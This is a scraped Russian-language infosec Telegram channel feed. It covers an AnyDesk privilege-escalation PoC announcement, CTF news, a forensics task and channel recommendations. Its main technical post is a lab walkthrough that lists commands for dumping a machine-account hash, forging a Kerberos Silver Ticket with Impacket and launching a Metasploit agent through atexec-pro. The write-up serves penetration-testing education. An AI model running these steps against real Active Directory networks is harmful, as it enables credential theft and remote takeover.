Forwarded from RedTeam brazzers (Миша)
Всем привет!
Недавно вышел интересный разбор LPE-уязвимости CVE-2024-12754 через AnyDesk. Разбор подробный, однако без POC. Поэтому надо исправлять :)
Сам механизм повышения привилегий основывается на возможности контроля целевого файла, который копируется в доступную для чтения низкопривилегированного пользователя директорию.
Нам остается лишь заставить AnyDesk, работающий от лица системы, прочитать файл, недоступный нам. Автор в статье использует чтение SAM из Shadow Copy.
Разработку, тестирование и отладку я проводил на AnyDesk версии 8.0.10, которую качал отсюда.
Вы можете сами попробовать POCнуть эту уязвимость, используя набор инструментов от Google Project Zero.
Моя реализация доступна здесь. Она осуществляет чтение произвольного файла, после чего копирует его содержимое на рабочий стол текущему пользователю.
Хоть Windows и активно продвигает механизм защиты, именуемый RedirectionTrust, предотвращающий переход по ссылкам, созданными не администраторами, однако эта митигация зачастую не распространяется на службы, которые были разработаны сторонними компаниями. Причина проста: разработчики не знают о ней и забывают применить, отсюда и появляется возможность LPE.
Демо можно посмотреть здесь
Недавно вышел интересный разбор LPE-уязвимости CVE-2024-12754 через AnyDesk. Разбор подробный, однако без POC. Поэтому надо исправлять :)
Сам механизм повышения привилегий основывается на возможности контроля целевого файла, который копируется в доступную для чтения низкопривилегированного пользователя директорию.
Нам остается лишь заставить AnyDesk, работающий от лица системы, прочитать файл, недоступный нам. Автор в статье использует чтение SAM из Shadow Copy.
Разработку, тестирование и отладку я проводил на AnyDesk версии 8.0.10, которую качал отсюда.
Вы можете сами попробовать POCнуть эту уязвимость, используя набор инструментов от Google Project Zero.
Моя реализация доступна здесь. Она осуществляет чтение произвольного файла, после чего копирует его содержимое на рабочий стол текущему пользователю.
Хоть Windows и активно продвигает механизм защиты, именуемый RedirectionTrust, предотвращающий переход по ссылкам, созданными не администраторами, однако эта митигация зачастую не распространяется на службы, которые были разработаны сторонними компаниями. Причина проста: разработчики не знают о ней и забывают применить, отсюда и появляется возможность LPE.
Демо можно посмотреть здесь
Видели уже???
https://www.securitylab.ru/news/556556.php
После regreSSHion пошел какой-то тренд на вулны с SSH🔫
https://www.securitylab.ru/news/556556.php
После regreSSHion пошел какой-то тренд на вулны с SSH
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Критический баг в OpenSSH позволяет перехватывать SSH-сессии
Ваши SSH-сессии могут быть перехвачены, если немедленно не принять меры.
Forwarded from FEFU CTF💻
Команда EXE.1sior – 🥇 место на киберучениях, прошедших в рамках уральского форума «Кибербезопасность в финансах»!
В течение нескольких часов ребята, образовавшие своего рода Purple Team, расследовали инциденты информационной безопасности в виртуальном городе Неонополис.
Им предстояло разобраться с самыми разными недопустимыми событиями — от изменения цен на билеты в кинотеатре до сложной многоэтапной атаки на банкомат с проведением несанкционированного перевода.
Поздравляем с заслуженной победой!🎉
В течение нескольких часов ребята, образовавшие своего рода Purple Team, расследовали инциденты информационной безопасности в виртуальном городе Неонополис.
Им предстояло разобраться с самыми разными недопустимыми событиями — от изменения цен на билеты в кинотеатре до сложной многоэтапной атаки на банкомат с проведением несанкционированного перевода.
Поздравляем с заслуженной победой!
Please open Telegram to view this post
VIEW IN TELEGRAM
Silver Ticket — не просто атака, а теневая операция в сердце Active Directory.
Читать: https://habr.com/ru/articles/886584/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RDG CTF (Ilya)
Соревнования пройдут в двух зачетах: студенческом и школьном.
Призёры среди школьников смогут получить дополнительные баллы при поступлении в ДВФУ на направления «Информационная безопасность» и «Компьютерная безопасность»
Если вы не являетесь студентом, представляете разные вузы или обучаетесь в вузе за пределами Дальнего Востока, вы можете принять участие онлайн вне зачета.
👥 Состав команды: до 7 человек. Количество команд не ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я.
Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы
NetLogon
, LanManServer
и LanManWorkstation
и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации.Сделал я это следующим образом:
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (
nmap -p 445 -sT -Pn <serverIP>
), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга.Имеем 2 проблемы:
1) Не работают службы
NetLogon
, LanManServer
и LanManWorkstation
, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM;2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket.
Что же делать?
Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты?
А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера.
Начнем атаку!
Шаг 1. Silver Ticket🎫
Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'
...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта
impacket-lookupsid
из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720
После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения
KRB5CCNAME
:proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache
Шаг 2. ATExec Pro
После этого уже при помощи известного нам
atexec-pro.py
и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF): proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30
Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe
Поэтапно те же действия можно видеть на приложенных скриншотах.
1) Получение SID домена при помощи
impacket-lookupsid
;2) Создание Silvet Ticket при помощи
impacket-ticketer
для привилегированного доступа к целевому хосту;3) Получение доступа к целевому хосту при помощи
atexec-pro.py
с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
артрончик на пути к мировому господству😂
По cyberdefenders райтапы интересно будет вам читать? хотим?
По cyberdefenders райтапы интересно будет вам читать? хотим?
Please open Telegram to view this post
VIEW IN TELEGRAM
Вы уже разобрали Silver и Golden Ticket? Это лишь прелюдия.
Diamond & Sapphire — последние «сокровища» в цепочке уязвимостей с билетами.
В статье рассмотрим:
Читать: https://habr.com/ru/articles/891620/
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Райтапы по CTF{2025}
task.pcapng
18.1 KB
#forensics
А вот это очень интересная задача!
🦈 Спрей и Слёзы Wireshark’а
Дружище, у нас взлом! Похоже, криминал, по коням! 🚨 - часть 2
В очередной раз в галере "Ж" взломали какого-то "сына маминой подруги"
Тебе как самому единственному работяге в нашей конторе необходимо выяснить:
- Учетную запись над которой надругались хацкеры
- Какой глупенький пароль был у УЗ
- Какой вид атаки по (MITRE ATT&CK®) гопники из Мордора отжали креды у нашего хоббита
Флаг в формате: artrone{login%password%T1234.567}
Автор: @artrone
Сложность: “Почему я это делаю и куда делся мой отпуск?”
А вот это очень интересная задача!
🦈 Спрей и Слёзы Wireshark’а
Дружище, у нас взлом! Похоже, криминал, по коням! 🚨 - часть 2
В очередной раз в галере "Ж" взломали какого-то "сына маминой подруги"
Тебе как самому единственному работяге в нашей конторе необходимо выяснить:
- Учетную запись над которой надругались хацкеры
- Какой глупенький пароль был у УЗ
- Какой вид атаки по (MITRE ATT&CK®) гопники из Мордора отжали креды у нашего хоббита
Флаг в формате: artrone{login%password%T1234.567}
Автор: @artrone
Сложность: “Почему я это делаю и куда делся мой отпуск?”
Forwarded from Райтапы по CTF{2025}
Хочу поддержать крутых ребят, которые качают скиллы в ИБ, делятся знаниями и двигают сообщество вперед. Пусть их каналы найдут своих подписчиков, а авторы видят, что их труд действительно ценят.
Как и обещал — ловите список каналов, которые стоит заценить!
✅ @Thinkingoy
Помогает новичкам в CTF — разбирает задачки, пишет гайды. Ждем продолжения!
✅ @duckerz
Канал команды DUCKERZ. Ребята реально делают CTF доступным и интересным для всех. Они не только публикуют полезные материалы для новичков в ИБ, но и сами подняли крутую CTF-платформу. Если у тебя проблемы с форматом флага, платформа глючит или просто нужна подсказка, в их чате тебе помогут по-человечески, а не отмахнутся шаблонными ответами.
✅ @wh_lab
Обзор тулов для red team, разборы CVE и PoC (в основном внутрянка), CTF, стендоффы — все по делу.
✅ @k3vg3n_ch
CTF, Bug Bounty и просто зарисовки из жизни кибератлета.
✅ @s3c4rch
Авторские исследования, наработки, а скоро еще и материалы по куберам, докерам и облакам.
✅ @hackerblog
Личный блог с крутыми статьями и исследованиями через призму purple team.
✅ @hun7_0r_b3_hun73d
Обучалки по ИБ, инфобез-лайф, холиварные новости, а в планах — собственные исследования и CVE.
✅ @pentestnotes
Полезные фишки для пентеста.
✅ @RusNetInt
Все, что вы хотели знать про OSINT — от базовых вещей до неочевидных тонкостей.
Как и обещал — ловите список каналов, которые стоит заценить!
✅ @Thinkingoy
Помогает новичкам в CTF — разбирает задачки, пишет гайды. Ждем продолжения!
✅ @duckerz
Канал команды DUCKERZ. Ребята реально делают CTF доступным и интересным для всех. Они не только публикуют полезные материалы для новичков в ИБ, но и сами подняли крутую CTF-платформу. Если у тебя проблемы с форматом флага, платформа глючит или просто нужна подсказка, в их чате тебе помогут по-человечески, а не отмахнутся шаблонными ответами.
✅ @wh_lab
Обзор тулов для red team, разборы CVE и PoC (в основном внутрянка), CTF, стендоффы — все по делу.
✅ @k3vg3n_ch
CTF, Bug Bounty и просто зарисовки из жизни кибератлета.
✅ @s3c4rch
Авторские исследования, наработки, а скоро еще и материалы по куберам, докерам и облакам.
✅ @hackerblog
Личный блог с крутыми статьями и исследованиями через призму purple team.
✅ @hun7_0r_b3_hun73d
Обучалки по ИБ, инфобез-лайф, холиварные новости, а в планах — собственные исследования и CVE.
✅ @pentestnotes
Полезные фишки для пентеста.
✅ @RusNetInt
Все, что вы хотели знать про OSINT — от базовых вещей до неочевидных тонкостей.
Итак, я к вам с лютым подгоном 😎
Мой хороший друг и сокомандник Валера @d1sgr4c3 выступал вчера на пыхе с докладиком на тему перехвата управления в ядре Linux👾
Если не видели, то вот 👉👈
Выступление: https://phdays.com/ru/forum/program/?date=2025%2F5%2F23&searchString=%D0%92%D0%B0%D0%BB%D0%B5%D1%80&talk-id=2290
Потыкаться самому: https://github.com/d1sgr4c3/boffer
Мой хороший друг и сокомандник Валера @d1sgr4c3 выступал вчера на пыхе с докладиком на тему перехвата управления в ядре Linux
Если не видели, то вот 👉👈
Выступление: https://phdays.com/ru/forum/program/?date=2025%2F5%2F23&searchString=%D0%92%D0%B0%D0%BB%D0%B5%D1%80&talk-id=2290
Потыкаться самому: https://github.com/d1sgr4c3/boffer
Please open Telegram to view this post
VIEW IN TELEGRAM
Проснулся, значится, я сегодня утром, и первое, что увидел- Телеграм пишет мне, что я популярен🤯
1000 человек наблюдает за мной... не верится даже...
А если серьезно, то спасибо всем вам за это. Я искренне рад, что моя маленькая отдушина в виде этого канала интересна людям и, так или иначе, помогает узнать что-то новое.
По-прежнему, и дальше буду радовать вас контентом❤️🔥
Старичкам и недавним участникам респект, будущим подписчикам салам😎
Cheers🥂
1000 человек наблюдает за мной... не верится даже...
А если серьезно, то спасибо всем вам за это. Я искренне рад, что моя маленькая отдушина в виде этого канала интересна людям и, так или иначе, помогает узнать что-то новое.
По-прежнему, и дальше буду радовать вас контентом
Старичкам и недавним участникам респект, будущим подписчикам салам😎
Cheers
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Райтапы по CTF{2025}
Оп, хлоп, мы идем в Blue Team 💙🛡️
Хочу поделиться несколькими полезными ресурсами от сокурсника в практикуме:
1. Blue Team Labs Online — отличная платформа для отработки навыков киберзащиты.
2. CyberDefenders — еще один ресурс с практическими задачами и тренировками.
А также — большая база знаний, где собраны ссылки на курсы, сертификаты, стажировки и многое другое:
👉 Notion-сборник от Алексея Пыринова
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
#рекомендация@writeup_ctf
Хочу поделиться несколькими полезными ресурсами от сокурсника в практикуме:
1. Blue Team Labs Online — отличная платформа для отработки навыков киберзащиты.
2. CyberDefenders — еще один ресурс с практическими задачами и тренировками.
А также — большая база знаний, где собраны ссылки на курсы, сертификаты, стажировки и многое другое:
👉 Notion-сборник от Алексея Пыринова
#рекомендация@writeup_ctf
Please open Telegram to view this post
VIEW IN TELEGRAM
CyberDefenders
CyberDefenders - Blue Team Training Platform
Blue team training platform for SOC analysts, threat hunters, DFIR, and security blue teams to advance CyberDefense skills.